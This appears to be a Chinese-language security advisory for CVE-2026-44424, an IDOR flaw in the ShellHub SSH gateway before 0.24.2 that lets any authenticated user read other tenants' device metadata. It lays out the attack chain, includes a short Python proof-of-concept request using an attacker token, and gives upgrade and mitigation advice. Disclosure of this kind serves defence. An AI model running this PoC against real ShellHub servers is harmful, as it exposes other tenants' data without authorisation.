CVE-2026-44424 CVSS 6.5 中危

CVE-2026-44424 ShellHub越权读取漏洞

披露日期: 2026-05-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-44424

漏洞类型

越权读取 (IDOR)

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

ShellHub

漏洞概述

ShellHub是一个集中式SSH网关，在0.24.2版本之前存在安全缺陷。系统在处理`GET /api/devices/:uid`请求时，仅验证了用户身份认证，未验证设备归属的命名空间。任何已认证用户只需猜测或知道设备UID，即可读取任意租户的设备元数据。

技术细节

该漏洞属于不安全的直接对象引用（IDOR）。在ShellHub的API逻辑中，`GET /api/devices/:uid`端点用于获取设备详情。受影响版本在实现该接口时，虽然检查了请求者的JWT或API Key是否有效，但缺少了对设备与请求者所属命名空间关系的验证。攻击者首先需要注册并获取有效的凭证，随后通过枚举或推测目标设备的UID，构造包含该UID的API请求。由于后端未进行权限隔离，服务器会直接返回目标设备的完整对象，导致跨命名空间的信息泄露。

攻击链分析

STEP 1

步骤1

攻击者在ShellHub平台注册账号或获取有效的API凭证（JWT或API Key）。

STEP 2

步骤2

攻击者猜测或枚举目标设备的UID（唯一标识符）。

STEP 3

步骤3

攻击者使用自己的凭证，向`/api/devices/:uid`发送GET请求，其中uid为目标设备的UID。

STEP 4

步骤4

服务器返回目标设备的完整元数据，攻击者成功获取非授权信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2026-44424: ShellHub IDOR
# Attacker needs a valid JWT or API Key
target_url = "https://<shellhub-domain>/api/devices/<target_device_uid>"
headers = {
    "Authorization": "Bearer <attacker_valid_token>",
    "Content-Type": "application/json"
}

response = requests.get(target_url, headers=headers)

if response.status_code == 200:
    print("[+] Exploit Successful! Leaked Device Data:")
    print(response.json())
else:
    print(f"[-] Request failed with status code: {response.status_code}")

影响范围

ShellHub < 0.24.2

防御指南

临时缓解措施

建议立即升级到修复版本0.24.2。如果暂时无法升级，应实施网络访问控制（NAC），限制对ShellHub API的访问来源，并开启日志审计，监测针对非本命名空间设备UID的异常访问请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表